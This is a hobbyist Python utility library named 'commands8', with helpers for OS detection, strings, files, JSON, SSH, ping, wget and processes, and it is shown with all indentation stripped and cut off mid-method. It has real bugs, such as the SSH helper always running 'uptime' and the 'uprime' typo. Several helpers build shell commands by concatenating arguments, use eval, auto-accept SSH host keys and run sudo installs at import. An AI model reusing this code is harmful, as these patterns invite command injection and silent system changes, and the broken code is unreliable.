FRACKING_INPUT_DEBUG = False
# todo version diff
# todo export script as json?
# todo compare jsons?
# todo save changes as commit message?
# this shit for pycharm:
colorama = None; cprint = None; copypaste = None; pyautogui = None; Tk = None; Button = None; mainloop = None; paramiko = None
def get_Bench(start=False): # return class with those functions:
class Bench(object): # dir ignore
time_start = datetime.datetime.now()
time_end = None
quiet = False # d argument for disable print to terminal bnl1
prefix = "Bench runned in" # d what have been finished, will print if bnl1
# d "quiet" variable of class is False
@classmethod
def start(cls): # set time of begin to now
cls.time_start = datetime.datetime.now()
@classmethod
def get(cls): # dir ignore
cls.time_end = datetime.datetime.now()
delta = cls.time_end - cls.time_start
delta_combined = delta.seconds + delta.microseconds / 1E6
return delta_combined
@classmethod
def end(cls): # return delta between start and end
delta_combined = cls.get()
if not cls.quiet:
try:
colorama.init()
cprint(cls.prefix + " " + str(round(delta_combined, 2)) + " seconds", "grey", "on_white")
except TypeError:
print(cls.prefix + " " + str(round(delta_combined, 2)) + " seconds")
except AttributeError:
print(cls.prefix + " " + str(round(delta_combined, 2)) + " seconds")
return delta_combined
return Bench
class OS:
is_python3 = sys.version_info >= (3, 0) # d boolean
python_implementation = None # d string with name of python implementation: "cpython" or "pypy"
python_version_major = sys.version_info.major # d int of major python version
python_commandline_version = ""
if is_python3:
python_commandline_version = "3" # d string of addable "3" to commandline apps if python is 3rd version
family = None # d string with family of OS: "nt" or "unix"
name = None # d string with name of OS: "windows", "linux", or "macos"
windows_version = None # d only on Windows, integer of major version of Windows
display = None # d didn't work yet
cyrrilic_support = None # d boolean variable of cyrrilic output support
if sys.platform == "linux" or sys.platform == "linux2":
name = "linux"
elif sys.platform == "win32" or sys.platform == "cygwin":
name = "windows"
windows_version = sys.getwindowsversion().major
elif sys.platform == "darwin":
name = "macos"
if platform.python_implementation == "PyPy":
python_implementation = "pypy"
else:
python_implementation = "cpython"
if name == "windows":
family = "nt"
elif name in ["macos", "linux"]:
family = "unix"
try: # todo make this work!
if name == "linux":
from Xlib.display import Display
display = True
except ImportError:
display = False
print("Your system haven't display -_-")
try:
cyrline = "йцукенгшщзхъфывапролджэячсмитьбюЙЦУКЕНГШЩЗХЪФЫВАПРОЛДЖЭЯЧСМИТЬБЮ"
for cyrsybol in cyrline:
print(cyrsybol*2, end="\r")
print(" ", end="\r")
cyrrilic_support = True
except UnicodeEncodeError as err:
cyrrilic_support = False
# print (err)
print ("Your system doesn't properly work with cyrrilic -_-")
class Internal:
@staticmethod
def mine_import(module_name, objects=None, justdownload=False, az=None): # import
# d module, if module not found, trying to install it by pip
# check for pip module
if FRACKING_INPUT_DEBUG: debug_Bench = get_Bench()
if FRACKING_INPUT_DEBUG: debug_Bench.start()
def just_install(module_name):
import pip
pip.main(['install', module_name])
modules_list = []
for item in pkgutil.iter_modules():
modules_list.append(item[1])
if "pip" not in modules_list:
if OS.name == "linux":
os.system("sudo apt-get install python" + OS.python_commandline_version + "-pip")
if module_name not in modules_list:
###########RARE###########
if module_name == "pyautogui":
if OS.name == "linux":
if OS.is_python3:
os.system("apt-get install python-xlib")
else:
os.system("apt-get install python3-Xlib")
if OS.name == "macos":
for package in ["python" + OS.python_commandline_version + "-xlib",
"pyobjc-core", "pyobjc"]:
just_install(package)
if OS.python_implementation == "pypy":
Print.debug("Yep, PyPy doesn't support pyobjc")
if module_name in ["win32api","win32con"]:
just_install("pypiwin32")
else:
###########RARE###########
just_install(module_name)
if not justdownload:
if az and objects:
if len(objects.split(",")) == 1:
globals()[az] = importlib.import_module(objects[0], package=module_name)
print("Internal.mine_import doesn't support both attributes use 'az' and 'objects', so only 'objects' will apply.")
az = None
if az:
import importlib
globals()[az] = importlib.import_module(module_name)
elif objects:
# import importlib # todo better code
# for object in objects.split(",")
# globals()[object] = importlib.import_module(name, package=module_name):
#### if " as " in object поделить и применить правильно, то есть имя назначить второе, а импортировать из первого
exec("from " + module_name + " import " + objects, globals())
else:
import importlib
globals()[module_name] = importlib.import_module(module_name)
if FRACKING_INPUT_DEBUG: debug_Bench.prefix = module_name + " " + str(objects)
if FRACKING_INPUT_DEBUG: debug_Bench.end()
@staticmethod
def dir_c(): # d print all functionality of commands8
first_func_after_class = 1
cnt_of_all_def = 0
cnt_of_commented_def = 0
for line in Str.nl(File.read(Path.extend(Path.commands8(), "commands8.py"))): # dir ignore
if "# dir ignore" not in line: # dir ignore
if "bnl" in line: # dir ignore
print(newline*Str.get_integers(line)[-1], end="") # dir ignore
line = line.replace("bnl"+str(Str.get_integers(line)[-1]),"")
if "def " in line: # dir ignore
print(newline*first_func_after_class + line) # dir ignore
first_func_after_class = 1
cnt_of_all_def += 1
if " # " in line: cnt_of_commented_def += 1
elif ("class " in line) and (line[0:4] != " "): # dir ignore
first_func_after_class = 0
print(newline + line) # dir ignore
elif "# d " in line: # dir ignore
print(line.replace("# d ", "# ", 1)) # dir ignore
Print.debug(cnt_of_all_def, cnt_of_commented_def)
@staticmethod
def rel(quiet=False): # d reload commands8, if you use it not in REPL, activate quiet argument
# d require additional line of code after reload if you import not entrie commands8
# d you need manually add "from commands8 import *" to script/REPL
# d if you import like "import commands8", additional line of code not needed
import commands8, importlib
commands8 = importlib.reload(commands8)
del commands8
string = "from commands8 import *" # you need to manually add this string to code :(
if not quiet:
print('"'+string+'" copied to clipboard')
import copypaste
copypaste.copy(string)
pass
if OS.display:
if OS.python_implementation != "pypy":
if OS.name != "macos:":
Internal.mine_import("pyautogui", justdownload=True)
Internal.mine_import("paramiko", justdownload=True)
Internal.mine_import("tkinter") # from tkinter import *
import json, \
shutil, \
time, \
random, \
subprocess, \
datetime, \
re, \
ctypes, \
getpass
if OS.name == "windows":
Internal.mine_import("win_unicode_console")
Internal.mine_import("win32api")
Internal.mine_import("win32con")
Internal.mine_import("termcolor")
Internal.mine_import("colorama")
colorama.init()
colorama.deinit()
Internal.mine_import("termcolor", objects="colored, cprint") # print_green_on_cyan = lambda x: cprint(x, 'green', 'on_cyan')
if OS.name == "windows":
Internal.mine_import("pyperclip", az="copypaste")
else:
Internal.mine_import("copypaste")
newline = '\n' # d string with newline bnl3
ruble = u"\u20bd" # d string with ₽ symbol
backslash = "\ "[:1] # d string with backslash
newline2 = "\r\n" # d string with other newline
class Print():
@staticmethod
def debug(*arguments, raw=False): # d just more notable print, only for
# d debugging
line = "-" * Console.width()
print("<<<Debug sheet:>>>")
for arg in arguments:
print(line, end="")
if raw:
print(repr(arg))
else:
print(arg)
print(line)
print("<<<End of debug sheet>>>")
@staticmethod
def rewrite(*arguments, sep=" ", raw=False): # d string, that can be rewritable
# d note, that you need to rewrite string to remove characters
line = " " * Console.width()
if OS.name == "windows":
line = line[:-1]
print(line, end="\r")
print(*arguments, sep=sep, end="\r")
class Str:
@staticmethod
def to_quotes(some_string): # d just place input string inside "" quotes
return '"' + str(some_string) + '"'
@staticmethod
def to_quotes_2(some_string): # d place input string inside '' quotes
return "'" + str(some_string) + "'"
@staticmethod
def get_integers(string): # d return list_ of integers from string, !!!floating not supported!!!
# todo add support for floating numbers, it will be cool!
integer_found = False
integers = []
current_integer = 0
negative = False
for symbol in str(string) + " ": # in exception some processing, meh :(
try:
if symbol in ['-', '—']:
negative = True
continue
int(symbol)
current_integer = current_integer*10 + int(symbol)
integer_found = True
except ValueError:
if integer_found:
if negative:
current_integer = -current_integer
integers = integers + [current_integer]
current_integer = 0
integer_found = False
negative = False
return integers
@staticmethod
def newlines_to_strings(string, quiet=False): # split long string with line
# d breaks to separate strings in list_
if string:
string = str(string)
if OS.name == "windows":
strings = string.split(newline2)
if len(strings) == 1:
strings = strings[0].split(newline)
elif OS.name in ["macos", "linux"]:
strings = string.split(newline)
return strings
else:
if not quiet:
print("None can't be splitted")
@classmethod
def nl(cls, string): # alias to newline
return cls.newlines_to_strings(string=string)
@staticmethod
def split_every(string, chars): # split string every
chars = int(chars)
output_lines = []
char_exists = "."
char_can_be_exists = ".?"
regexp = char_exists + char_can_be_exists*(chars-1)
for line in re.findall(regexp, str(string)): # todo can I just return this list_?
output_lines += [line]
return output_lines
@staticmethod
def leftpad(string, leng, ch="0", rightpad=False): # d return string with
# d added characters to left side. If string longer — return original string
string = str(string)
if len(string) >= leng:
return string
strOfCh = str(ch) * leng
string_output = strOfCh[len(string):leng] + string
if rightpad:
string_output = string + strOfCh[len(string):leng]
return string_output
@classmethod
def rightpad(cls, string, leng, ch="0"): # return string with added
# d characters to right side. If string longer — return original string
return cls.leftpad(string, leng, ch=ch, rightpad=True)
@staticmethod
def substring(string, before, after=None, return_after_substring=False): # return
# d string that between "before", and "after" strings, not including
# d those. If "return_after_substring", return typle with substring and
# d part of string after it.
startfrom = string.find(before)
if startfrom != -1:
startfrom = string.find(before) + len(before)
else:
startfrom = 0
if (after) or (after == ""):
end_at = string[startfrom:].find(after)
if end_at != -1:
end_at = startfrom + string[startfrom:].find(after)
substring = string[startfrom:end_at]
after_substring = string[end_at:]
else:
substring = string[startfrom:]
after_substring = ""
else:
substring = string[startfrom:]
if return_after_substring:
#try:
# after_substring
#except UnboundLocalError:
# Print.debug("string", string,
# "before", before,
# "after", after,
# "return_after_substring", return_after_substring,
# "substring", substring,
# "after_substring", "UnboundLocalError: local variable 'after_substring' referenced before assignment")
return substring, after_substring
return substring
@staticmethod
def diff_simple(string_a, string_b): # d print all symbol differents.
# d Not all mine code, must rewrite.
# todo rewrite this shit.
import difflib
strings = [(string_a, string_b)] # for furthurer support for unlimited srtings
for a, b in strings:
print('{} => {}'.format(a, b))
for i, s in enumerate(difflib.ndiff(a, b)):
if s[0] == ' ':
continue
elif s[0] == '-':
print(u'Delete "{}" from position {}'.format(s[-1], i))
elif s[0] == '+':
print(u'Add "{}" to position {}'.format(s[-1], i))
print()
@staticmethod
def input_pass(string="Password:"): # d return string from user, securely
# d inputed by getpass library
return getpass.getpass(string)
@staticmethod
def input_int(message="Input integer: ", minimum=None, maximum=None, default=None, quiet=False):
# d return integer from user with multible parameters.
output_int = "jabla fitta"
if default:
message = "(Enter = " + str(default) + ")"
while output_int == "jabla fitta": # цикл, пока не получит итоговое число
integer = input(message)
if integer != "":
try:
integer = Str.get_integers(integer)[0]
except IndexError:
print("Это не число")
continue
elif default and integer != "":
output_int = default
elif integer == "":
print("Это не число")
raise ValueError
if minimum:
if int < minimum:
print("Число должно быть больше", minimum)
raise ValueError
if maximum:
if int > maximum:
print("Число должно быть меньше", maximum)
raise ValueError
output_int = integer
break
if not quiet:
print("Итоговое число:", output_int)
return output_int
class Console():
@staticmethod
def clean(): # wipe terminal output. Not tested on linux
# todo test on linux
if OS.name == "windows":
os.system("cls")
elif OS.name == "linux":
print(newline * shutil.get_terminal_size().lines)
elif OS.name == "macos":
os.system(r"clear && printf '\e[3J'")
@staticmethod
def width(): # return width of terminal window in characters
if OS.name == "windows":
io = Console.get_output("mode con")
width_ = Str.get_integers(io)[1]
elif OS.name in ["linux", "macos"]:
io = Console.get_output("stty size")
width_ = Str.get_integers(io)[1]
return int(width_)
@staticmethod
def height(): # return height of terminal window in characters
if OS.name == "windows":
modecon = Console.get_output("mode con")
height = Str.get_integers(modecon)[0]
elif OS.name in ["linux", "macos"]:
sttysize = Console.get_output("stty size")
height = Str.get_integers(sttysize)[0]
if height > 100:
height = 100
return int(height)
@classmethod
def blink(cls, width=None, height=None, symbol="#", sleep=0.5):
# d fastly print to terminal characters with random color. Completely shit.
# d arguments width and height changing size of terminal, works only in
# d Windows.
if width is not None and height is not None:
os.system("mode con cols=" + str(width) + " lines=" + str(height))
if width is None:
width = cls.width()
if height is None:
height = cls.height()
colorama.reinit()
while True:
colors = ["grey", "red", "green", "yellow", "blue", "magenta", "cyan", "white"]
highlights = ["on_grey", "on_red", "on_green", "on_yellow", "on_blue", "on_magenta", "on_cyan", "on_white"]
string = symbol * width
color = random.choice(colors)
colors.pop(colors.index(color))
highlight = random.choice(highlights)
try: # New version with one long line. Works perfect, as I see.
string = string * height
print(termcolor.colored(string, color, highlight))
time.sleep(sleep)
except KeyboardInterrupt as err:
print(termcolor.colored("OK", "white", "on_grey"))
colorama.deinit()
cls.clean()
break
@staticmethod
def get_output(command, quiet=True, split_lines=False): # d return output
# d of executing command. Doesn't output it to terminal in realtime.
# d can be output after finished if "quiet" argument activated.
p = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
if OS.name == "windows":
output = p.decode("cp866")
elif OS.family == "unix":
output = p.decode("utf8")
if split_lines:
output = Str.nl(output)
return output
class Ssh:
@staticmethod
def get_output(host, username, password, command, safe=False): # return
# d output from command, runned on SSH server. Support only
# d username:password autorisation.
# todo autorisation by key.
if OS.python_implementation != "pypy":
Internal.mine_import("paramiko")
else:
raise OSError("paramiko doesn't supported by PyPy")
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # automatically add unknown hosts
ssh.connect(host, username=username, password=password)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("uptime")
if (ssh_stderr.read() != b'') and not safe:
raise IOError("ssh_stderr = " + str(ssh_stderr))
ssh.close()
return str(ssh_stdout.read(), 'utf8')
@classmethod
def get_avg_load_lin(cls, host, username, password, safe=False): # return
# d list_ of average loads from SSH linux server. Shit, I know
output = cls.get_output(host=host, username=username, password=password, command="uprime", safe=safe)
output = Str.substring(output, before="load average: ", after=newline)
output = output.split(", ")
return output
@classmethod
def get_uptime_lin(cls, host, username, password, safe=False): # return
# d string with uptime of SSH linux server. As I said before... :(
output = cls.get_output(host=host, username=username, password=password, command="uprime", safe=safe)
output = Str.substring(output, before=" up ", after=", ")
return output
class Path:
@staticmethod
def full(path):
return os.path.abspath(path)
@staticmethod
def commands8():
return os.path.dirname(os.path.realpath(__file__))
@staticmethod
def working():
return os.getcwd()
@classmethod
def extend(cls, *paths): # paths input strings of path1 pieces, return
# d string with path1, good for OS
for path_ in paths:
try:
path = os.path.join(str(path), str(path_))
except NameError: # first path1 piece is very important
if (OS.name == "windows") and path_ == backslash: # support for smb windows paths like \\ip_or_pc\dir\
path = backslash * 2
elif (OS.name == "windows") and (len(path_) <= 3):
path = os.path.join(path_, os.sep)
elif OS.name == "windows":
path = path_
elif OS.family == "unix":
if path_ == "..":
path = path_
elif path_ == ".":
path = path_
elif path_ == "~":
path = cls.home()
else:
path = os.path.join(os.sep, path_)
else:
raise FileNotFoundError("path_" + str(path_) + "is not expected")
return path
@staticmethod
def home(): # return path1 of home directory of current user. Not tested in
# d linux.
# todo test in lunux!
if OS.name == "windows":
path = Console.get_output(r"echo %userprofile%")
path = path.rstrip(newline2)
else:
path = Console.get_output("echo $HOME", split_lines=True)[0]
path = path.rstrip(newline)
return path
@staticmethod
def set_current(path, quiet=True): # changes current working directory.
# d If quiet is disabled, prints directory.
os.chdir(path)
if not quiet:
Print.debug("os.getcwd() # current directory is", os.getcwd())
class Locations:
if OS.name == "windows": # d ...
texteditor = "notepad" # d notepad is in every version of Windows, yea?
py = "py"
pyw = "pyw"
elif OS.name == "macos": # d ...
texteditor = "open" # d just open default program for file
py = "python3"
pyw = "python3"
elif OS.name == "linux": # d ...
texteditor = "nano" # d nano is everywhere, I suppose? ]-:
py = "python3"
pyw = "python3"
class Dir:
@staticmethod
def create(filename): # create dir if didn't exist
if not os.path.exists(filename):
os.makedirs(filename)
@staticmethod
def commands8(): return Path.commands8() # alias to Path.commands8
@staticmethod
def working(): return Path.working() # alias to Path.working
@staticmethod
def list_of_files(path): # return list_ of files in folder
return os.listdir(path)
@staticmethod
def number_of_files(path, quiet=False): # return integer of number of files
# d in directory
try:
dir_contents = Dir.contents(path)
if not quiet:
print(os.path.split(path)[1], "contain", len(dir_contents), "files")
return len(dir_contents)
except FileNotFoundError:
if not quiet:
print("Path", path, "isn't found")
return None
@classmethod
def batch_rename(cls, directory, input_str, output_str, quiet=False):
for filename in cls.contain(directory):
if input_str in filename:
final_name = filename.replace(input_str, output_str)
File.rename(filename, final_name)
if not quiet:
print(filename, "renamed to", final_name)
class File:
@staticmethod
def create(filename):
filename = Path.full(filename)
if os.path.split(filename)[0] != "":
Dir.create(os.path.split(filename)[0])
if not os.path.exists(filename):
with open(filename, 'a'): # open file and close after
os.utime(filename, None) # changes time of file modification
if not os.path.exists(filename):
raise FileNotFoundError("error while creating file " + filename +
"try to repair script at " + Path.full(sys.argv[0]))
@staticmethod
def delete(path, quiet=False): # ...
if os.path.isdir(path):
raise IsADirectoryError(path + " is directory, use Dir.delete to delete")
try:
os.remove(path)
except FileNotFoundError:
if not quiet:
print("file", path, "is not exist")
if not quiet:
print("file", path, "is deleted")
time.sleep(0.05)
if os.path.exists(path):
raise FileExistsError(path + " is not deleted")
@staticmethod
def move(input_file, output_file): # ...
shutil.move(input_file, output_file)
@staticmethod
def copy(input_file, output_file): # ...
shutil.copy2(input_file, output_file)
@staticmethod
def rename(input_file, output_file): # ...
File.move(input_file, output_file)
@staticmethod
def hide(filename, quiet=True): # adding dot to filename and set attribute
# d FILE_ATTRIBUTE_HIDDEN to file, if running on Windows
filename = Path.full(filename)
if OS.name == "windows":
win32api.SetFileAttributes(filename, win32con.FILE_ATTRIBUTE_HIDDEN) # hiding file like windows do
dotted_file = Path.extend(os.path.split(filename)[0], "." + os.path.split(filename)[1]) # adding dot
File.rename(filename, dotted_file)
if not quiet:
print ("file", filename, "is hidden now")
return dotted_file
@classmethod
def backup(cls, filename, subfolder="bak", hide=True, quiet = False):
# d move file to subfolder, adds sort of timestamp to filename and hide
# d file if necessary
filename = Path.full(filename) # normalize filename
backupfilename = str(filename) + "." + Time.dotted() + ".bak" # add dottedtime to backup filename
backupfilename = os.path.split(backupfilename) # splitting filename to folder and file
try: # if subfolder has no len
if len(subfolder) < 1: # if subfolder has zero len
raise TypeError("subfolder must have non-zero len")
except TypeError: # if subfolder has no len
subfolder = "bak" # set subfolder to default
print("len(subfolder) < 1, so subfolder = 'bak'") # print error
subfolder = Path.extend(backupfilename[0], subfolder) # append subfolder name
Dir.create(subfolder) # create subfolder
backupfilename = Path.extend(subfolder, backupfilename[1]) # backup file name full path1
shutil.copy2(filename, backupfilename) # finally backup file
if hide:
backupfilename = cls.hide(backupfilename) # hiding file
if not os.path.isfile(backupfilename): # if file is not created
raise FileNotFoundError(backupfilename + " isn't created while backup")
if not quiet: # if finction is not shutted up
print("backup of file", filename, "created as", backupfilename) # all is ok, print that
return backupfilename
@staticmethod
def wipe(path): # clean content of file
file = open(path, 'w')
file.close()
@staticmethod
def read(path): # return pipe to file content
with open(path, "r") as f:
return f.read()
class Time:
rnd = str(random.randint(1,100))
@classmethod
def fuck(cls):
print("fuck it all "+cls.rnd)
@staticmethod
def stamp():
return time.time()
@staticmethod
def dotted():
dateandtime = Time.get("year") + "." + Time.get("month", 2) + "." + \
Time.get("day", 2) + "_at_" + Time.get("hour", 2) + "." + \
Time.get("minute", 2) + "." + Time.get("second", 2) + "." + \
Time.get("microsecond", 6)
return dateandtime
@staticmethod
def get(size, zfill=0):
return Str.leftpad(eval("str(datetime.datetime.now()." + size + ")"), leng=zfill, ch=0)
@staticmethod
def rustime(customtime=None):
if customtime:
day = datetime.datetime.fromtimestamp(customtime).strftime('%d')
month = datetime.datetime.fromtimestamp(customtime).strftime('%m')
year = datetime.datetime.fromtimestamp(customtime).strftime('%Y')
hour = datetime.datetime.fromtimestamp(customtime).strftime('%H')
minute = datetime.datetime.fromtimestamp(customtime).strftime('%M')
second = datetime.datetime.fromtimestamp(customtime).strftime('%S')
else:
gettime = datetime.datetime.now()
day = gettime.strftime("%d")
month = gettime.strftime('%m')
year = gettime.strftime('%Y')
hour = gettime.strftime('%H')
minute = gettime.strftime('%M')
second = gettime.strftime('%S')
rustime = str(day) + " числа " + str(month) + " месяца " + str(year) + " года в " \
+ str(hour) + ":" + str(minute) + ":" + str(second)
if not OS.cyrrilic_support:
rustime = str(day) + "." + str(month) + "." + str(year) + "y at " \
+ str(hour) + ":" + str(minute) + ":" + str(second)
return rustime
@staticmethod
def timer(seconds, check_per_sec=10):
Countdown = get_Bench()
Countdown.start()
secs_second_var = int(seconds)
while Countdown.get() < seconds:
time.sleep(1/check_per_sec)
secs_left_int = int(seconds - Countdown.get())
if secs_left_int != secs_second_var:
secs_second_var = secs_left_int
Print.rewrite("Timer for " + str(seconds) + " seconds. " + str(secs_left_int) + " left")
Print.rewrite("")
class Json():
@classmethod
def check(cls, filename):
try:
cls.load(filename)
return True
except: # any exception is False
print("JSON is bad")
return False
@classmethod
def save(cls, filename, jsonstring, quiet=False, debug=False):
try:
File.create(filename)
settingsJsonTextIO = open(filename, "w")
json.dump(jsonstring, settingsJsonTextIO)
settingsJsonTextIO.close()
if not quiet:
print("JSON succesfull saved")
if debug:
print("sys.argv[0] =",sys.argv[0])
print(jsonstring)
except:
raise IOError("error while saving JSON, try to repair script at path1 " +
Path.full(sys.argv[0]))
json_test_string = cls.load(filename, quiet=True)
if jsonstring != json_test_string:
Print.debug("jsonstring_to_save", jsonstring, "json_test_string_from_file", json_test_string)
raise IOError("error while saving JSON, try to repair script at path1 " +
Path.full(sys.argv[0])) # exception
@classmethod
def load(cls, filename, quiet = False, debug=False):
try:
if not os.path.isfile(filename):
File.create(filename)
cleanjson = {}
cls.save(filename, cleanjson)
settingsJsonTextIO = open(filename)
jsonStringInMemory = json.load(settingsJsonTextIO)
settingsJsonTextIO.close()
if not quiet:
print("JSON succesfull loaded")
if debug:
print(jsonStringInMemory)
return jsonStringInMemory
except:
raise IOError("error while loading JSON, try to repair script at path1 " +
Path.full(sys.argv[0]))
class List:
@staticmethod
def flatterize(input_list):
if not ((isinstance(input_list,list)) or (isinstance(input_list,tuple))):
raise TypeError("object of type '"+str(type(input_list))+"' can't be flatterized")
output_list = copy.deepcopy(list(input_list))
cnt = 0
for object in output_list:
if not isinstance(object, (str,int)):
output_list.pop(cnt)
for item in reversed(object):
output_list.insert(cnt, item)
cnt+=1
return output_list
@staticmethod
def split_every(list_input, count):
count = int(count)
output_lists = [list_input[x:x+count] for x in range(0, len(list_input), count)] # https://stackoverflow.com/questions/9671224/split-a-python-list-into-other-sublists-i-e-smaller-lists
return output_lists # todo отдебажить пограничные моменты
class Process():
@staticmethod
def kill(process):
if OS.name == "windows":
command_ = "taskkill /f /im " + str(process) + ".exe"
try:
int(process)
command_ = "taskkill /f /pid " + str(process)
except:
pass
elif OS.name == "macos":
command_ = "killall " + str(process)
try:
int(process)
command_ = "kill " + str(process)
except:
pass
else:
Gui.warning("OS " + str(OS.name) + " not supported")
os.system(command_)
@staticmethod
def start(*arguments, new_window=False, debug=False, pureshell=False):
arguments = List.flatterize(arguments)
if debug:
Print.debug("Process.start arguments", arguments)
if new_window or pureshell:
for argument_ in arguments:
if " " in argument_ and argument_[:1] != "-":
if OS.name == "windows":
argument_ = Str.to_quotes(argument_)
else:
argument_ = Str.to_quotes_2(argument_)
try:
command = command + " " + argument_
except NameError:
if new_window:
if OS.name == "windows":
command = 'start "" ' + argument_
elif OS.name == "macos":
Gui.warning("macOS doesn't support creating new window now")
#command = "" +
else:
command = argument_
os.system(command)
else:
if OS.name == "windows":
commands = []
for argument_ in arguments:
commands.append(str(argument_))
subprocess.call(commands)
elif OS.name == "macos":
commands = ""
for argument_ in arguments:
commands += str(argument_) + " "
# print(commands)
os.system(commands)
class Dict:
@staticmethod
def iterable(dict):
return dict.items()
class Codegen:
debug = False
@classmethod
def start(cls, file_path):
File.wipe(file_path)
cls.file = open(file_path, "wb")
@classmethod
def add_line(cls, code):
cls.file.write(code.encode('utf8'))
if cls.debug:
print(code)
@classmethod
def end(cls, quiet=False):
cls.file.close()
shebang = "#! python3" + newline + \
"# -*- coding: utf-8 -*-" + newline
def plog(logfile, logstring="some shit happened", customtime=None, quiet=False, backup=True):
if not quiet:
print(logstring)
File.create(logfile)
if backup:
File.backup(logfile, quiet=True)
file = open(logfile, "a")
if customtime:
file.write(Time.rustime(customtime) + " " + str(logstring) + newline)
else:
file.write(Time.rustime() + " " + str(logstring) + newline)
file.close()
class Network:
@staticmethod
def getDomainOfUrl(url):
url_output = Str.substring(url, "://", "/")
if url_output == "":
url_output = Str.substring(url, "://")
return url_output
@classmethod
def ping(Network, domain ="127.0.0.1", count=1, quiet=False, logfile=None, timeout=10000):
# с таким эксепшном можно сделать куда проще это всё
domain = Network.getDomainOfUrl(domain)
if not quiet:
colorama.reinit()
Print.rewrite("Pinging", domain, count, "times...")
up_message = domain + " is up!"
down_message = domain + " is down."
try:
if OS.name == "windows":
count_arg = "n"
timeout_arg = "w"
if OS.name in ["macos", "linux"]:
count_arg = "c"
timeout_arg = "W"
if OS.name == "linux":
timeout = int(timeout/1000)
command = "ping " + domain + " -" + count_arg + " " + str(count) + \
" -" + timeout_arg + " " + str(timeout)
ping_output = Console.get_output(command)
except KeyboardInterrupt:
sys.exit()
except: # any exception is not good ping
ping_output = ""
if ("TTL" in ping_output) or ("ttl" in ping_output):
up = True
else:
up = False
if logfile:
if up:
plog(logfile, domain + " is up!", quiet=True)
cprint(up_message, "white", "on_green")
else:
plog(logfile, down_message, quiet=True)
cprint(down_message, "white", "on_red")
elif not quiet:
Print.rewrite("")
if up:
cprint(up_message, "white", "on_green")
else:
cprint(down_message, "white", "on_red")
colorama.deinit()
return up
class Fix:
def winRepair_UnicodeEncodeError(quiet=""):
if quiet:
quiet = " > null"
os.system("chcp 65001" + quiet)
os.system("set PYTHONIOENCODING = utf - 8")
class Bash:
escapable_chars = [backslash]
@classmethod
def argument_escape(cls, argument):
for char in cls.escapable_chars:
argument = argument.replace(char, backslash+char)
return Str.to_quotes(argument)
class macOS:
class osascript:
@staticmethod
def quotes_escape(string):
quote_1 = '"'
#quote_2 = "'"
# if there any already escaped symbols:
string = string.replace(backslash, backslash*3) # if there any other escaped symbols except quotes
string = string.replace(backslash*3+quote_1, backslash*2+quote_1) # removing one backslash, because it will added furthurer
#string = string.replace(backslash*3+quote_2, backslash*2+quote_2)
# usual quotes escape
escaped_1 = backslash + quote_1
#escaped_2 = backslash + quote_2
string = string.replace(quote_1,escaped_1)
#string = string.replace(quote_2, escaped_2)
return string
@classmethod
def notification(cls, message, title="python3", subtitle=None, sound=None, list_of_sounds=False):
# https://apple.stackexchange.com/questions/57412/how-can-i-trigger-a-notification-center-notification-from-an-applescript-or-shel# - just applescript
# better realizations:
# advanced commandline tool - https://github.com/vjeantet/alerter
# simpler commandline tool - https://github.com/vjeantet/alerter
# commands = "display notification \"message\" with title \"title\" subtitle \"subtitle\" sound name \"Sosumi\""
commands = "display notification " + Str.to_quotes(cls.osascript.quotes_escape(message))
if title or subtitle:
commands += " with "
if title:
commands += "title " + Str.to_quotes(cls.osascript.quotes_escape(title)) + " "
if subtitle:
commands += "subtitle " + Str.to_quotes(cls.osascript.quotes_escape(subtitle)) + " "
if sound:
commands += " sound name " + Str.to_quotes(cls.osascript.quotes_escape(sound))
commands = cls.osascript.quotes_escape(commands) # escaping quotes:
commands = Str.to_quotes(commands) # applescript to quotes
Process.start("osascript", "-e", commands) # f start(*arguments, new_window=False, debug=False, pureshell=False):
if list_of_sounds:
Print.debug("global sounds", Dir.list_of_files(Path.extend("System", "Library", "Sounds")), "local sounds", Dir.list_of_files(Path.extend("~", "Library", "Sounds")))
class Gui:
def warning(message):
try:
try:
sys.ps1
sys.ps2
interactive_mode = True
except:
interactive_mode = False
Print.debug("interactive_mode", interactive_mode)
try:
not_dot_py = sys.argv[0][-3] != ".py" # todo check logic
except:
not_dot_py = True
if (not_dot_py or (sys.argv[0] != "")) and (not interactive_mode):
Print.debug("sys.argv", sys.argv)
Print.debug("Something wrong with sys.argv. Tkinter doesn't like it.")
input()
except IndexError:
Print.debug("sys.argv", sys.argv)
raise RuntimeError ("Something wrong with sys.argv. Tkinter doesn't like it.")
if OS.name == 'macos':
macOS.notification(message)
if OS.name != "macos" and OS.python_implementation != "pypy":
Internal.mine_import("pyautogui")
pyautogui.alert(message)
else:
Print.debug("PyPy doesn't support pyautogui, so warning is here:", warning)
input("Press Enter to continue")
class Tkinter():
@staticmethod
def color(red, green, blue): # return string of color matching for use in
# d Tkinter
return str('#%02x%02x%02x' % (red, green, blue))
class Windows:
@staticmethod
def lock(): # locking screen, work only on Windows < 10
if OS.windows_version and (OS.windows_version != 10):
ctypes.windll.LockWorkStation() # todo fix Windows 10
else:
raise OSError("Locking work only on Windows < 10")
class Random:
@staticmethod
def integer(min, max): # return random integer
return random.randrange(min, max+1)
@staticmethod
def float(min, max): # return random floating number
return random.uniform(min, max)
@staticmethod
def string(length):
import string
return ''.join(random.choices(string.ascii_uppercase + string.ascii_lowercase + string.digits, k=length))
class Wget:
@staticmethod
def download(url, output, quiet=False): # just wrapper for commandline wget
arguments = '--header="Accept: text/html" ' + \
'--user-agent="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) ' + \
'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3167.0 Safari/537.36"'
if quiet:
command = "wget '" + url + "' -O " + output + " " + arguments
return Console.get_output(command)
else:
url = url.replace("&", backslash + "&")
Process.start("wget", url, "-O", output, arguments, pureshell=True)
# Another way to fix blocks by creating ~/.wgetrc file https://stackoverflow.com/a/34166756
class Int:
@staticmethod
def from_to(start, end, to_str=False): # return list_ of integers, if argument
# g "to_str" activated, return list_ of strings with equal length
roots = range(start, end + 1)
if to_str:
output = []
max_len = max(len(str(start)), len(str(end)))
for root in roots:
if root < 0:
output.append("-" + Str.leftpad(-root, max_len-1, 0))
else:
output.append(Str.leftpad(root, max_len, 0))
return output
else:
return roots
class CLI():
@staticmethod
def get_y_n(question=""):
while True:
inputtt = input(str(question) + " (y/n)?")
inputtt = inputtt.strip(" ")
if inputtt == "y":
return True
if inputtt == "n":
return False
wait_update_pos = 0
@classmethod
def wait_update(CLI, quiet=False):
